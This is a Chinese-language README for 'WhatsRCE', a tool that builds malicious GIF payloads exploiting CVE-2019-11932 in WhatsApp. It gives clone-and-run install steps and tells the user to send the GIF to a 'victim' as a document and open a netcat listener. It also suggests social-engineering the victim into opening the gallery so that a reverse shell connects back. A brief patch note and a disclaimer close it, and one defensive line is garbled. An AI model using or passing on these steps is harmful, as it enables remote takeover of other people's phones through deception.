WhatsRCE
这是一个自动生成CVE-2019-11932(WhatsApp远程代码执行)漏洞的有效载荷的工具
- 自动安装GCC(无害命令,你可以看到这是开源的)
- 保存为 .GIF 文件
如何使用?
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
如何获取Shell?
- 只需将 .GIF 文件以 文档而非图片 的形式发送给受害者用户
- 并将nc/netcat设置为你在WhatsRCE工具上设置的端口 {nc -lnvp 你的端口}
- 你可以使用社会工程学攻击,诱使受害者触发此漏洞
- 告诉受害者通过WhatsApp打开相册,并让受害者发送任意照片(无需实际发送,只需进入相册即可),几秒钟后你将收到来自受害者的Shell连接
或者直接观看以下视频
演示视频
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view
如果以上链接无法访问
https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK
如何防范此攻击?
- 将你的WhatsApp更新到最新版本 (已在2.19.244版本中修复)
- 如何接收来自陌生人的任何文件,包括音频、图片等
此工具仅用于学习,后果自负。如果你将其用于犯罪,我概不负责!